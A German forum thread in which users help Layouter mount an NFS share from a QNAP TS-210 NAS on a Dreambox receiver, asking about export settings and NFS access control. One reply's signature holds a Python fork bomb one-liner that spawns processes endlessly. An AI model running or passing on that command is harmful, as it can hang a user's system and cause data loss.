NAS Qnap 210

This site uses cookies. By continuing to browse this site, you are agreeing to our Cookie Policy.

• NAS Qnap 210

Guten Morgen,
      hab mir eine ONAP210 zugelegt. Das Nas wird auch vom Netzwerkbrowser mit allen
      NFS Freigaben angezeigt. Zusätzlich habe ich im NAS ein Directorie mit dem Namen Dreambox angelegt und eine neues PW vergeben.
      Im MountEdit ist als Serverfreigabe /Dreambox gesetzt.
      Das Mounten des Laufwerkes funktioniert mit dieser Pfadangabe so leider nicht.
      Hat jemand einen Tip für mich?

Grüße und schon mal vielen Dank
      Layouter
      1x DM8000 Newnigma 3.2.2
      1x 7020 HD Newnigma 4.0.2
      1x PVR800HD Newnigma 3.2.2
      2x DM 600 PVR
      Ext. Speicher: QNAP-NAS TS-210, 2x 1 TB 3,5' HDD

The post was edited 1 time, last by Layouter ().

• RE: NAS Qnap 210

Moin
      1.Wie sieht die freigabe auf dem server aus (welches verzeichnis wird exportiert mit welchen parametern)
      2.Wie sieht die freigabe auf der box aus die du mounten willst z.b ein screenshot wäre hilfreich oder die automounts.xml
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • RE: NAS Qnap 210

Original von Layouter
      Guten Morgen,
      hab mir eine ONAP210 zugelegt. Das Nas wird auch vom Netzwerkbrowser mit allen
      NFS Freigaben angezeigt. Zusätzlich habe ich im NAS ein Directorie mit dem Namen Dreambox angelegt und eine neues PW vergeben.
      Im MountEdit ist als Serverfreigabe /Dreambox gesetzt.
      Das Mounten des Laufwerkes funktioniert mit dieser Pfadangabe so leider nicht.
      Hat jemand einen Tip für mich?

Grüße und schon mal vielen Dank
      Layouter

Moin,

also ich habe einen qnap ts-109p und mit dem klappt das einwandfrei, also sollten wir das hinbekommen :D
      Hast du auch die ip deiner dreambox in der nfs Zugriffssteuerung eingegeben?

Gruß
      cruiser

DM900UHD DVB-C/T2 Newnigma2 OE 2.5 Daily